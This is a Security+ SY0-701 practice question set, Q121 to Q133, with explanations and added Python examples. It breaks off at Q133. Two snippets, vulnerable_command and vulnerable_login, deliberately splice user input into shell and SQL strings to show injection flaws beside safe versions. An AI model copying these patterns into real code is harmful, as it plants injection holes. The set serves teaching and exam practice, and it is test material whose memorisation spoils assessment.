CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set 7 Q121-140


Q121. A security administrator notices multiple failed login attempts from a single user account originating from different geographic locations within a few minutes. Which type of attack is most likely occurring?

A)  Brute-force attack
B)  Credential stuffing
C)  Man-in-the-middle attack
D)  Phishing

Answer: B)  Credential stuffing

Explanation:

A) Brute-force attack is a method where an attacker systematically attempts every possible password combination against a single account until the correct password is discovered. This approach is typically slow and resource-intensive because of the sheer number of possible combinations, especially if password complexity is high. Brute-force attacks usually target a single account rather than multiple accounts and may trigger account lockout mechanisms if the system is properly configured. In this scenario, the rapid login attempts from multiple geographic locations do not align with the characteristics of a traditional brute-force attack, as brute-force would not normally occur simultaneously across multiple regions unless a sophisticated botnet was involved.

B)  Credential stuffing is correct. Credential stuffing attacks exploit previously leaked or stolen username-password pairs. Attackers automate login attempts across many accounts using these credentials, relying on the fact that users frequently reuse passwords across different systems. The key indicators of credential stuffing include multiple failed logins in a short timeframe, attempts from varied geographic IP addresses, and automated login scripts that can bypass manual observation. The rapid succession of failed login attempts for the same account from different locations strongly indicates the use of automated tools for credential stuffing. Unlike brute-force, which guesses passwords, credential stuffing uses known credentials to gain access, making it more effective against reused passwords. Detection and mitigation strategies include implementing multi-factor authentication (MFA), monitoring unusual login locations, rate limiting, IP blacklisting, and educating users on password hygiene to prevent reuse across platforms.

C)  Man-in-the-middle (MITM) attack occurs when an attacker intercepts and possibly alters communication between two parties without their knowledge. MITM attacks can capture credentials or manipulate traffic, but they do not manifest as repeated login attempts from multiple locations. MITM would involve interception or eavesdropping rather than automated testing of stolen credentials, making it unlikely in this scenario.

D)  Phishing involves tricking users into providing credentials through deceptive emails, websites, or messages. While phishing often leads to compromised accounts that may be targeted in credential stuffing, phishing alone does not produce the behavior described in the scenario. Multiple login attempts from diverse geographic locations are indicative of an automated attack using already stolen credentials, not the initial credential capture phase that phishing represents.

Credential stuffing attacks are especially dangerous because they exploit human behavior (password reuse) rather than technical vulnerabilities, meaning even highly secured systems can be compromised if users reuse credentials across platforms. Security controls like MFA, anomaly detection, and strong password policies are essential to mitigate this threat. Additionally, monitoring authentication logs for unusual login patterns, failed login spikes, and geographic anomalies can provide early warning of credential stuffing campaigns. Organizations should also participate in breach intelligence sharing to identify potentially compromised credentials and proactively enforce password resets for affected accounts.

Q122. A company wants to enforce that users can access cloud resources only from devices that meet specific security requirements, such as being managed, patched, and compliant with antivirus policies. Which type of access control model should be implemented?

A)  Role-based access control
B)  Attribute-based access control
C)  Mandatory access control
D)  Discretionary access control

Answer: B)  Attribute-based access control

Explanation:

A) Role-based access control (RBAC) grants access permissions based on the role assigned to a user within the organization. Roles are predefined and provide a convenient way to manage large numbers of users. However, RBAC does not inherently evaluate dynamic or contextual attributes such as device compliance, security posture, or environmental conditions. It grants permissions solely based on organizational roles, making it insufficient for scenarios that require conditional access based on device health or real-time security assessments.

B)  Attribute-based access control (ABAC) is correct. ABAC evaluates access requests based on multiple attributes, which can include user identity, role, device health, location, time of day, and risk level. In this scenario, ABAC enables the organization to enforce that only managed, patched, and antivirus-compliant devices can access cloud resources. ABAC provides fine-grained and dynamic access control by combining policy rules with contextual information. The implementation often integrates with identity providers, endpoint management solutions, and compliance checks to ensure that access decisions are made in real-time. ABAC is a key component of zero-trust security models, as it enforces strict access controls even for authenticated users and allows for continuous evaluation of security posture.

C) Mandatory access control (MAC) enforces access policies based on data classification levels and security labels assigned by a central authority. MAC is highly rigid and does not consider dynamic device attributes or real-time context. While MAC ensures data confidentiality through strict hierarchical rules, it lacks the flexibility to evaluate security posture or compliance requirements for endpoints, making it unsuitable for enforcing device-specific access policies in cloud environments.

D) Discretionary access control (DAC) allows users to grant or revoke access to resources they own. This model relies on user discretion and does not provide centralized enforcement of policy rules or device-based access constraints. DAC lacks the capability to dynamically assess attributes such as device compliance or security posture, making it ineffective for enforcing conditional cloud access policies.

ABAC is increasingly critical in modern enterprise environments, especially for organizations implementing zero-trust frameworks or requiring adaptive access controls based on endpoint security. It allows security teams to define flexible policies that evaluate multiple attributes simultaneously, reduce attack surfaces, and prevent unauthorized access, even from legitimate users on non-compliant devices. ABAC policies can integrate with cloud platforms, mobile device management (MDM), and endpoint detection tools to automate enforcement, continuously monitor compliance, and adapt to emerging threats.
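The following is an added example (not part of the original question set) of how an ABAC policy engine combines the attributes named above into one decision. The rule names, the `Subject`/`Device`/`Context` structures and the risk-score scale are hypothetical; the point is that a device that fails any posture check is denied even though the user's role would have been sufficient under RBAC.

```python
from dataclasses import dataclass


@dataclass
class Subject:
    user: str
    role: str


@dataclass
class Device:
    managed: bool            # enrolled in MDM / endpoint management
    patched: bool            # OS and agent patch level within policy
    antivirus_compliant: bool


@dataclass
class Context:
    location: str
    risk_score: int          # constructed scale: 0 (low) .. 100 (high)


# Each rule receives the full attribute set and returns True if it is satisfied.
def device_compliant(subject, device, ctx):
    return device.managed and device.patched and device.antivirus_compliant


def role_permitted(subject, device, ctx):
    # Hypothetical set of roles allowed to reach the cloud resource.
    return subject.role in {"engineer", "analyst"}


def risk_acceptable(subject, device, ctx):
    return ctx.risk_score < 70


# An ABAC policy: every named rule must pass (deny by default).
POLICY = [
    ("device_compliant", device_compliant),
    ("role_permitted", role_permitted),
    ("risk_acceptable", risk_acceptable),
]


def evaluate_abac(subject, device, ctx, policy=POLICY):
    """Return (allowed, failed_rule_names) for one access request."""
    failed = [name for name, rule in policy if not rule(subject, device, ctx)]
    return (len(failed) == 0, failed)


def evaluate_rbac(subject):
    """Contrast: an RBAC decision looks at the role only."""
    return subject.role in {"engineer", "analyst"}
```

Run `evaluate_abac` twice with the same engineer, once from a patched and once from an unpatched device: RBAC allows both, ABAC denies the second and reports `device_compliant` as the failed rule, which is the audit detail a conditional-access log should carry.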

Q123. During a penetration test, an analyst discovers a web application that allows users to submit input that is executed by the underlying operating system without validation. What type of attack can exploit this vulnerability?

A)  Cross-site scripting
B)  SQL injection
C)  Command injection
D)  Path traversal

Answer: C)  Command injection

Explanation:

A) Cross-site scripting (XSS) attacks target the users of a web application by injecting malicious scripts that execute in the victim’s browser. XSS exploits the client side rather than the server side and does not allow attackers to execute operating system commands directly. It is primarily used to steal session cookies, perform phishing attacks, or manipulate the content viewed by users. The scenario describes execution at the OS level, making XSS an incorrect option.

B) SQL injection occurs when unvalidated input manipulates SQL queries executed against a database. SQL injection can lead to unauthorized data access, modification, or deletion but does not directly execute commands on the underlying operating system. While potentially severe, SQL injection is specific to database operations and is therefore not the attack type described here.

C)  Command injection is correct. Command injection vulnerabilities allow attackers to execute arbitrary operating system commands via unsanitized input fields. Exploitation occurs when input is passed to shell commands without proper validation, escaping, or parameterization. This can result in full system compromise, privilege escalation, installation of backdoors, or access to sensitive data. Command injection attacks are particularly dangerous because they bypass application logic and interact directly with the operating system, providing attackers the ability to manipulate files, processes, or network configurations. Mitigation involves strict input validation, use of safe APIs, principle of least privilege, and containment strategies to prevent execution of arbitrary commands.

D)  Path traversal involves manipulating file paths to access files outside the intended directory structure. While path traversal can lead to unauthorized file access, it does not allow execution of OS-level commands, making it unsuitable for this scenario.

Command injection remains one of the most critical web application vulnerabilities due to the potential for complete system compromise. Secure coding practices, continuous vulnerability scanning, and rigorous input validation are necessary to prevent this type of attack. In modern cloud environments, application sandboxing, containerization, and strict privilege separation further mitigate the risks posed by command injection vulnerabilities.
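As an added example (not code from the original page), the snippet below shows the defect pattern beside its hardened forms: a hostname lookup assembled as a shell string, the same lookup built as an argument list with no shell, and, for the case where a shell cannot be avoided, quoting with `shlex.quote`. The `host` utility and the hostname pattern are assumptions used for illustration; nothing is executed here.

```python
import re
import shlex
import subprocess

# Allow-list for a DNS hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)*$")


def vulnerable_command(host):
    """INSECURE: user input is concatenated into a string that a shell parses,
    so shell metacharacters in `host` become additional commands."""
    return "host " + host            # would be run with shell=True


def validate_hostname(host):
    """Strict allow-list validation: anything outside the hostname grammar is rejected."""
    return len(host) <= 253 and HOSTNAME_RE.fullmatch(host) is not None


def build_safe_argv(host):
    """Safe API: validate, then pass an argument list. With no shell involved,
    the value is delivered to the program as one argument, never parsed."""
    if not validate_hostname(host):
        raise ValueError("rejected input: not a hostname")
    return ["host", host]


def hardened_shell_command(host):
    """If a shell string is unavoidable, quote the value so it stays a single word."""
    return "host " + shlex.quote(host)


def run_lookup(host, timeout=5):
    """Run the lookup without a shell; only reached with validated input."""
    return subprocess.run(build_safe_argv(host), capture_output=True, text=True, timeout=timeout)
```

`validate_hostname` rejects any value containing `;`, `|`, whitespace or quotes outright, and `build_safe_argv` never hands a string to a shell; together with a least-privilege service account this is the layered mitigation the explanation describes.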

Q124. A company requires employees to authenticate to cloud applications using a password and a one-time code generated on a mobile device. What type of authentication is being used?

A)  Single-factor authentication
B)  Two-factor authentication
C)  Biometric authentication
D)  Certificate-based authentication

Answer: B)  Two-factor authentication

Explanation:

A)  Single-factor authentication uses only one type of credential, such as a password. While common, it is susceptible to attacks like credential theft, phishing, and brute-force because it relies on a single proof of identity. Single-factor authentication does not meet modern security requirements for protecting sensitive cloud resources.

B) Two-factor authentication (2FA) is correct. In this scenario, the password represents “something you know” and the one-time code generated on a mobile device represents “something you have.” Two independent factors provide significantly stronger security because compromising one factor (e.g., the password) is insufficient to gain access without the second factor. 2FA mitigates risks from stolen credentials, phishing, or automated attacks. It is widely implemented in cloud services, financial applications, and corporate systems to enhance security and comply with regulatory standards. Proper deployment requires secure OTP generation, robust delivery mechanisms, and fallback processes in case of device loss or failure.

C)  Biometric authentication relies on physical characteristics, such as fingerprints or facial recognition, which are not being used in this scenario. While biometrics can provide an additional factor, it is not relevant to the scenario described.

D)  Certificate-based authentication uses digital certificates and cryptographic keys to verify identity. While highly secure, this scenario does not involve certificates; it relies on passwords and one-time codes.

Implementing two-factor authentication significantly strengthens the security posture of organizations by requiring attackers to compromise multiple independent factors, reducing the risk of unauthorized access even in the presence of stolen or weak passwords. Organizations should combine 2FA with user education, risk-based adaptive authentication, and monitoring to maximize protection.

Q125. A security audit finds that multiple employees are sharing credentials to access critical systems, making it impossible to track who performed specific actions. Which security principle is being violated?

A)  Accountability
B)  Separation of duties
C)  Least privilege
D)  Role rotation

Answer: A)  Accountability

Explanation:

A) Accountability is correct. Accountability ensures that every action performed within a system can be traced to a unique individual. When users share credentials, it becomes impossible to determine which user executed a particular operation, undermining audit trails, forensic investigations, and compliance with standards such as SOX, PCI DSS, and HIPAA. Maintaining unique, individual credentials ensures traceability and deters misuse or fraud. Implementing audit logging, monitoring, and user-specific authentication enforces accountability.

B)  Separation of duties distributes responsibilities among multiple individuals to reduce fraud and error but does not directly address credential sharing. Although separation of duties can mitigate risk from misuse, the immediate violation in this scenario is the inability to attribute actions to a specific user.

C)  Least privilege limits user access to only what is necessary for their job. Credential sharing may bypass least privilege controls, but the principle being violated is primarily accountability, not access control.

D) Role rotation periodically shifts responsibilities among users to detect irregularities or prevent insider threats. While helpful for security governance, it does not address the direct issue of shared credentials and inability to track actions.

Credential sharing poses significant risks, including insider threats, lack of traceability, and regulatory non-compliance. Enforcement of unique user credentials, strong authentication mechanisms, and regular audits are essential to uphold accountability. Security policies, awareness programs, and technical controls such as single sign-on (SSO) with individualized credentials support proper enforcement.

Q126. A security team detects a sudden spike in network traffic aimed at a critical web server, causing the server to become unresponsive. Which type of attack is most likely occurring?

A)  Distributed denial-of-service attack
B)  Phishing
C)  SQL injection
D)  Man-in-the-middle attack

Answer: A)  Distributed denial-of-service attack

Explanation:

A)  Distributed denial-of-service (DDoS) attack is correct. A DDoS attack occurs when multiple compromised systems, often part of a botnet, flood a target server, application, or network with excessive traffic, overwhelming its resources and causing legitimate users to be denied service. Key indicators of a DDoS include: sudden spikes in traffic from multiple geographic locations or IP addresses, unusual types of network requests, and degradation or complete loss of service. DDoS attacks can target the network layer (e.g., SYN floods), transport layer (e.g., UDP floods), or application layer (e.g., HTTP floods). These attacks can be extremely damaging to businesses, causing financial losses, reputational damage, and operational disruptions. Mitigation strategies involve deploying DDoS protection services, traffic filtering, rate limiting, and using content delivery networks (CDNs) to absorb traffic. Continuous monitoring and traffic anomaly detection are also crucial.

B)  Phishing is a social engineering attack designed to trick individuals into providing credentials or other sensitive information. While phishing can be used to gain access to systems or launch further attacks, it does not directly overwhelm network resources or cause servers to become unresponsive. Phishing campaigns typically target users via email, messaging platforms, or websites, not infrastructure traffic, making this option incorrect in the context of a sudden traffic spike.

C)  SQL injection is a web application attack that manipulates backend SQL queries through unsanitized input. While severe, SQL injection generally affects databases and data integrity rather than causing a direct flood of network traffic. It could be used to exfiltrate or manipulate data but does not match the described scenario of server unresponsiveness due to traffic volume.

D)  Man-in-the-middle (MITM) attack occurs when an attacker intercepts communication between two parties. MITM can capture credentials, modify messages, or inject malicious content, but it does not create a high volume of traffic targeting a server to make it unavailable. MITM focuses on stealthy interception rather than causing resource exhaustion, so it does not fit this scenario.

DDoS attacks are increasingly used for extortion, political motives, or competitive disruption. Organizations employ layered defenses including network traffic monitoring, anomaly detection, and automated mitigation mechanisms to ensure availability of critical services during attacks. Advanced DDoS attacks may combine volumetric, protocol, and application-layer methods, making proactive threat intelligence and adaptive mitigation crucial for resilience.

Q127. A penetration tester finds that a web application accepts user input that is used directly in database queries without proper validation. Which attack can exploit this vulnerability?

A)  Cross-site scripting
B)  SQL injection
C)  Command injection
D)  Path traversal

Answer: B)  SQL injection

Explanation:

A)  Cross-site scripting (XSS) targets end-users by injecting scripts into web pages viewed by others. It affects the client-side and does not allow attackers to manipulate database queries directly. XSS can lead to cookie theft, session hijacking, or content manipulation but does not compromise server-side database operations, making it inappropriate for this scenario.

B)  SQL injection is correct. SQL injection exploits vulnerabilities in web applications where user input is embedded into SQL statements without proper validation or sanitization. Attackers can manipulate these queries to exfiltrate data, modify or delete database records, bypass authentication mechanisms, or execute administrative operations. Indicators include unexpected application behavior, error messages revealing database structure, or abnormal query patterns observed in logs. Prevention strategies include using parameterized queries or prepared statements, input validation, least-privilege database accounts, and regular vulnerability assessments. SQL injection is a critical threat due to its high impact on data confidentiality, integrity, and availability.

C) Command injection targets operating system commands rather than database queries. While dangerous, command injection exploits occur when input is executed directly in the system shell, not in SQL statements. The scenario specifically involves database query manipulation, so command injection is incorrect here.

D)  Path traversal allows unauthorized access to files outside intended directories. While serious, path traversal attacks do not manipulate database queries and are unrelated to the described input vulnerability. Attackers may use it to read sensitive files, but it cannot execute SQL operations, making this option inappropriate.

SQL injection remains one of the most prevalent and dangerous web application vulnerabilities. Mitigation requires secure coding practices, rigorous input validation, use of parameterized queries, and proactive vulnerability scanning. Combining these approaches with logging and monitoring helps detect attempted attacks before significant damage occurs.
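To make the "embedded into SQL statements" defect concrete, here is an added example (not from the original page) using Python's built-in `sqlite3`: a login check that interpolates user input into the query beside the parameterized version the explanation recommends. The table, the stored values and the `hash-of-alice-password` placeholder are constructed for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed in-memory database with one user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-alice-password')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password_hash):
    """INSECURE: input is spliced into the SQL text, so quotes and comment
    markers in `username` change the structure of the statement."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn, username, password_hash):
    """Parameterized query: the statement text is fixed and the driver binds
    the values, so input can only ever be compared as data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()[0] > 0


def structure_is_fixed(username):
    """Detection aid for code review: the only acceptable pattern is a query
    whose text does not change with the input; this helper reports whether
    the vulnerable builder would emit a different statement shape."""
    return "'" not in username and "--" not in username
```

`safe_login` with the username `alice' --` simply finds no row, whereas `vulnerable_login` with the same input has its password clause commented out and reports success; the monitoring side of the explanation corresponds to alerting on quote characters and comment sequences arriving in form fields.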

Q128. An organization wants to ensure that sensitive cloud data is encrypted in a way that the cloud provider cannot access it, and the organization maintains control of the encryption keys. Which encryption model does this describe?

A)  Provider-managed encryption
B)  Customer-managed encryption with provider key storage
C)  Customer-managed encryption with customer key storage
D)  Provider-managed encryption with customer key storage

Answer: C)  Customer-managed encryption with customer key storage

Explanation:

A) Provider-managed encryption relies entirely on the cloud provider to generate, store, and manage encryption keys. While it encrypts data at rest, the provider retains the ability to decrypt data and may be compelled by legal or government orders. This does not provide exclusive control to the organization and is unsuitable for scenarios requiring full confidentiality from the provider.

B) Customer-managed encryption with provider key storage allows the organization to manage encryption policies, but the keys reside in the provider’s infrastructure. This reduces risk compared to provider-managed encryption but still grants the provider potential access. If compliance or legal requirements demand that the provider cannot decrypt data, this model is insufficient.

C)  Customer-managed encryption with customer key storage is correct. In this model, the organization generates, stores, and manages encryption keys independently, often using hardware security modules (HSMs) or secure key vaults. The cloud provider can store encrypted data but cannot decrypt it without the organization’s keys. This provides strong confidentiality, ensures compliance with strict regulatory requirements (e.g., HIPAA, GDPR, financial regulations), and reduces risk of provider-side compromise. Implementation requires robust key lifecycle management, including generation, rotation, revocation, and secure backup. Organizations must also prepare for disaster recovery and key loss scenarios to prevent permanent data loss.

D)  Provider-managed encryption with customer key storage is not a practical or supported model, as providers cannot manage keys fully controlled and stored by customers. This combination would be inconsistent with operational feasibility.

Customer-managed encryption with customer key storage provides maximum control and ensures cryptographic autonomy, balancing cloud convenience with stringent data confidentiality requirements. Organizations should also combine this with access controls, auditing, and monitoring to ensure secure key usage and compliance.

Q129. A security analyst observes that attackers are using stolen usernames and passwords from a previous breach to attempt automated logins across multiple internal systems. Which attack is occurring?

A)  Brute-force attack
B)  Credential stuffing
C)  Password spraying
D)  Keylogging

Answer: B)  Credential stuffing

Explanation:

A) Brute-force attacks systematically attempt all possible password combinations for a single account. Brute-force is usually slow and resource-intensive and does not rely on previously exposed credentials. While effective in some scenarios, it does not fit the description of using known stolen credentials across multiple accounts.

B)  Credential stuffing is correct. Credential stuffing exploits password reuse from previous breaches. Attackers automate login attempts using large volumes of leaked username-password pairs. Indicators include login attempts from multiple IP addresses, rapid automated access attempts across many accounts, and use of previously exposed credentials. Mitigation strategies include enforcing multi-factor authentication (MFA), monitoring unusual login activity, educating users on password hygiene, and ensuring unique passwords per system. Unlike password spraying, which targets weak passwords across accounts, credential stuffing relies on already known credentials, making it highly effective against organizations with password reuse issues.

C)  Password spraying attempts a small set of common passwords across multiple accounts without using known credentials. While related to brute-force, it does not exploit credentials obtained from breaches. This attack is less targeted than credential stuffing.

D) Keylogging is a malware-based method for capturing user input, such as usernames and passwords. It is unrelated to automated login attempts using leaked credentials, so it does not match the scenario described.

Credential stuffing attacks exploit human behavior (password reuse) rather than technical vulnerabilities. Strong authentication, proactive monitoring, and user education are critical for mitigating this growing threat. Organizations should also leverage threat intelligence and breached credential monitoring to respond rapidly.
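The indicators listed for credential stuffing in Q121 (a burst of failures on one account from several geographic locations) and in Q129 (one source trying many accounts) can both be checked from authentication logs. The following added example (not from the original page) runs two sliding-window detectors over constructed log lines; the log format, the thresholds and the IP addresses (documentation ranges) are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log: timestamp user source_ip country result
SAMPLE_LOG = """\
2024-05-01T10:00:01Z alice 203.0.113.5 US FAIL
2024-05-01T10:00:07Z alice 198.51.100.9 DE FAIL
2024-05-01T10:00:12Z alice 192.0.2.77 BR FAIL
2024-05-01T10:00:20Z alice 198.51.100.200 CN FAIL
2024-05-01T10:00:25Z bob 203.0.113.5 US FAIL
2024-05-01T10:00:31Z carol 203.0.113.5 US FAIL
2024-05-01T10:00:36Z dave 203.0.113.5 US FAIL
2024-05-01T10:30:00Z erin 192.0.2.10 US SUCCESS
"""


def parse_log(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, country, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, ip, country, result))
    return events


def _windowed(items, window):
    """Yield, for each failure, the values of the failures that follow it within `window`."""
    items.sort()
    for i, (start, _) in enumerate(items):
        yield [v for ts, v in items[i:] if ts - start <= window]


def accounts_hit_from_many_places(events, window=timedelta(minutes=5), min_failures=3, min_countries=2):
    """Q121 pattern: one account, several failures, several countries, short time."""
    fails = defaultdict(list)
    for ts, user, ip, country, result in events:
        if result == "FAIL":
            fails[user].append((ts, country))
    flagged = {}
    for user, items in fails.items():
        for countries in _windowed(items, window):
            if len(countries) >= min_failures and len(set(countries)) >= min_countries:
                flagged[user] = sorted(set(countries))
                break
    return flagged


def sources_hitting_many_accounts(events, window=timedelta(minutes=5), min_accounts=3):
    """Q129 pattern: one source cycling through a leaked list across many accounts."""
    fails = defaultdict(list)
    for ts, user, ip, country, result in events:
        if result == "FAIL":
            fails[ip].append((ts, user))
    flagged = {}
    for ip, items in fails.items():
        for users in _windowed(items, window):
            if len(set(users)) >= min_accounts:
                flagged[ip] = len(set(users))
                break
    return flagged
```

Both detectors are deliberately coarse; in production the thresholds would be tuned against the baseline failure rate, and a hit would feed the rate limiting, MFA step-up and forced-reset actions the explanations above list.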

Q130. A penetration tester discovers that a Linux server has a root-owned cron job that executes a script every few minutes. The script is writable by all users. Which attack is most likely possible?

A)  Privilege escalation
B)  Lateral movement
C)  Credential harvesting
D)  Pivoting

Answer: A)  Privilege escalation

Explanation:

A)  Privilege escalation is correct. In this scenario, the cron job runs with root privileges, but the script is writable by all users. An attacker or tester can modify the script to include malicious commands that will execute with root permissions the next time the cron job runs. This allows an unprivileged user to gain full administrative access to the system. Privilege escalation is a common consequence of misconfigured cron jobs, improper file permissions, or insecure service configurations. Once root access is gained, attackers can establish persistence, install backdoors, or further compromise the system. Mitigation includes enforcing strict file permissions, applying the principle of least privilege, monitoring cron jobs, and performing regular security audits.

B) Lateral movement occurs after initial compromise, where attackers move to other systems on the network to escalate access or gather more information. While privilege escalation may facilitate lateral movement, it is not the immediate vulnerability in this scenario.

C)  Credential harvesting involves capturing passwords or tokens from memory, files, or input devices. While an attacker with root access may perform credential harvesting later, the described vulnerability allows privilege escalation rather than direct credential capture.

D)  Pivoting is using a compromised host as a platform to attack other systems. Privilege escalation may enable pivoting, but the immediate vulnerability is gaining root access through the writable cron job.

Misconfigured cron jobs are a critical risk in Linux environments. Security best practices include limiting file permissions, ensuring proper ownership, and auditing scheduled tasks to prevent unauthorized privilege escalation. Monitoring logs and employing file integrity monitoring tools can help detect malicious changes.
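The "auditing scheduled tasks" recommendation can be automated. Below is an added example (not from the original page) that parses system-crontab lines, resolves the script each root job runs and reports scripts that are world-writable or not owned by root; the crontab text and the script files are constructed in a temporary directory so the check runs offline, and the seven-field system crontab layout is the assumption it relies on.

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Yield (user, command_path) for each job line in a system crontab
    (minute hour day month weekday user command...). Comments and
    environment assignments are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ("=" in line.split()[0]):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        yield user, command.split()[0]


def script_findings(path):
    """Permission/ownership defects that let an unprivileged user alter the script."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing"]
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_uid != 0:
        findings.append("owner-not-root")
    return findings


def audit_crontab(text, only_user="root"):
    """Map each script run by `only_user` to its list of findings (empty = clean)."""
    return {path: script_findings(path) for user, path in parse_system_crontab(text) if user == only_user}


def build_demo():
    """Constructed fixture: one safe script (0755) and one world-writable script (0777)."""
    d = tempfile.mkdtemp()
    safe = os.path.join(d, "rotate.sh")
    unsafe = os.path.join(d, "cleanup.sh")
    for p, mode in ((safe, 0o755), (unsafe, 0o777)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho demo\n")
        os.chmod(p, mode)
    crontab = (
        "SHELL=/bin/sh\n"
        "# constructed sample system crontab\n"
        f"0 3 * * * root {safe}\n"
        f"*/5 * * * * root {unsafe} --quiet\n"
        f"*/10 * * * * www-data {unsafe}\n"
    )
    return crontab, safe, unsafe
```

Pair the check with file integrity monitoring on the reported paths: a world-writable script run by a root job is exactly the condition in the question, and the fix is `chmod o-w` plus root ownership, then confirming the finding list comes back empty.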

Q131. A company wants to enforce strict access control in its network so that users can only perform actions they are explicitly permitted to, and no one can override the access policies. Which access control model should be implemented?

A)  Discretionary access control
B)  Role-based access control
C)  Mandatory access control
D)  Attribute-based access control

Answer: C)  Mandatory access control

Explanation:

A)  Discretionary access control (DAC) allows resource owners to grant or revoke access to objects at their discretion. While DAC is flexible, it does not provide strict enforcement by a central authority. Users can potentially share permissions or override security policies, which makes it unsuitable for environments that require rigid control and regulatory compliance.

B) Role-based access control (RBAC) assigns permissions based on user roles within the organization. While RBAC simplifies management and reduces errors compared to DAC, it lacks the centralized enforcement and strict labeling that some highly secure environments require. RBAC does not inherently prevent a user from granting their own access to others if misconfigured, so it is less secure than mandatory approaches for highly sensitive environments.

C) Mandatory access control (MAC) is correct. MAC enforces access policies dictated by a central authority rather than the data owner. Objects and subjects are labeled with sensitivity levels (e.g., Confidential, Secret, Top Secret), and access decisions are based on these labels and a set of security rules. MAC is often used in government, military, and critical infrastructure contexts where compliance and strict data separation are mandatory. Key characteristics include:

Centralized policy enforcement: Users cannot modify access policies themselves.
Label-based security: Files, systems, and network resources are tagged with classification labels.
Rule-driven access: Access decisions are made based on matching user clearance with object sensitivity.
High assurance of confidentiality and integrity: Prevents accidental or intentional unauthorized access.

D)  Attribute-based access control (ABAC) grants access based on attributes such as user identity, device security posture, time, and location. ABAC is highly flexible and dynamic but requires complex policy management and infrastructure. While ABAC can enforce granular control, MAC provides stricter, non-overridable enforcement, which aligns with the requirements in this scenario.

MAC is ideal for environments where strict security is required, such as defense, intelligence, and highly regulated industries. Organizations implementing MAC often combine it with auditing, encryption, and monitoring to ensure compliance and prevent data leakage.
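As an added example (not from the original page) of the label-matching rule described above, the block below encodes the classification lattice and the two Bell-LaPadula confidentiality rules ("no read up", "no write down") that most MAC implementations enforce; the use of Bell-LaPadula, the lattice values and the single `policy_authority` role allowed to relabel objects are assumptions for illustration.

```python
# Ordered sensitivity lattice; higher number dominates lower.
LEVELS = {"Unclassified": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}

# Constructed sample objects and subjects.
OBJECTS = {"budget.xlsx": "Confidential", "opsplan.doc": "Secret", "sources.txt": "Top Secret"}
CLEARANCES = {"alice": "Secret", "bob": "Confidential", "policy_authority": "Top Secret"}


def dominates(a, b):
    return LEVELS[a] >= LEVELS[b]


def can_read(subject, obj):
    """No read up: the subject's clearance must dominate the object's label."""
    return dominates(CLEARANCES[subject], OBJECTS[obj])


def can_write(subject, obj):
    """No write down: writing to a lower label could leak higher data, so the
    object's label must dominate the subject's clearance."""
    return dominates(OBJECTS[obj], CLEARANCES[subject])


def relabel(subject, obj, new_label):
    """Centralized policy: only the designated authority may change a label;
    owners and ordinary users cannot override it (the MAC/DAC difference)."""
    if subject != "policy_authority":
        raise PermissionError("label changes are reserved to the central authority")
    if new_label not in LEVELS:
        raise ValueError("unknown classification")
    OBJECTS[obj] = new_label
    return OBJECTS[obj]


def decide(subject, obj, action):
    """Single entry point producing an auditable allow/deny decision."""
    if action == "read":
        return can_read(subject, obj)
    if action == "write":
        return can_write(subject, obj)
    raise ValueError("unknown action")
```

Note that Bob, cleared to Confidential, can write into the Secret document but not read it back; that asymmetry is the rule set doing its job, not a bug, and it is why MAC deployments pair the model with integrity controls and auditing as the text notes.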

Q132. A security analyst observes an internal user attempting to access files they do not normally use, repeatedly accessing sensitive directories outside of their department, and transferring data to an external USB device. Which type of threat is being observed?

A)  Insider threat
B)  Advanced persistent threat
C)  Credential stuffing
D)  Phishing

Answer: A)  Insider threat

Explanation:

A)  Insider threat is correct. Insider threats occur when a legitimate user within the organization intentionally or unintentionally engages in malicious activity or data misuse. In this scenario, the behavior includes unusual file access, attempts to access restricted directories, and data exfiltration to an external device. Key aspects of insider threats include:

Access misuse: Authorized users exploit legitimate access privileges to view, copy, or modify sensitive data.
Data exfiltration: Removing confidential data from the network, often via removable media or unauthorized transfers.
Behavior anomalies: Patterns of access inconsistent with normal job duties.
Potential sabotage: Altering or deleting critical files to disrupt operations.

Mitigation strategies include:

User activity monitoring (UAM) and auditing.
Role-based access control with least privilege enforcement.
Data loss prevention (DLP) solutions to restrict sensitive data transfers.
Employee awareness programs and whistleblower channels.

B)  Advanced persistent threat (APT) is usually external in origin, involving sophisticated, long-term cyber campaigns targeting organizations for espionage or intellectual property theft. While APTs may use insider help, this scenario specifically describes suspicious internal user behavior.

C)  Credential stuffing involves automated login attempts using previously leaked credentials. It targets account compromise, not malicious activity by an authenticated insider.

D)  Phishing targets users externally to steal credentials or install malware. While phishing can facilitate insider threats indirectly, it does not describe the internal behavior observed here.

Insider threats are among the most challenging to detect and mitigate because the attacker already has legitimate access. Continuous monitoring, behavioral analytics, strict access controls, and security awareness programs are critical to minimizing the risk of data breaches and operational sabotage.

Q133. During a penetration test, the tester finds that a web application stores session tokens in URLs instead of cookies. Which security vulnerability does this represent, and why is it critical?

A)  Cross-site scripting
B)  Session hijacking
C)  SQL injection
D)  Man-in-the-middle attack

Answer: B)  Session hijacking

Explanation:

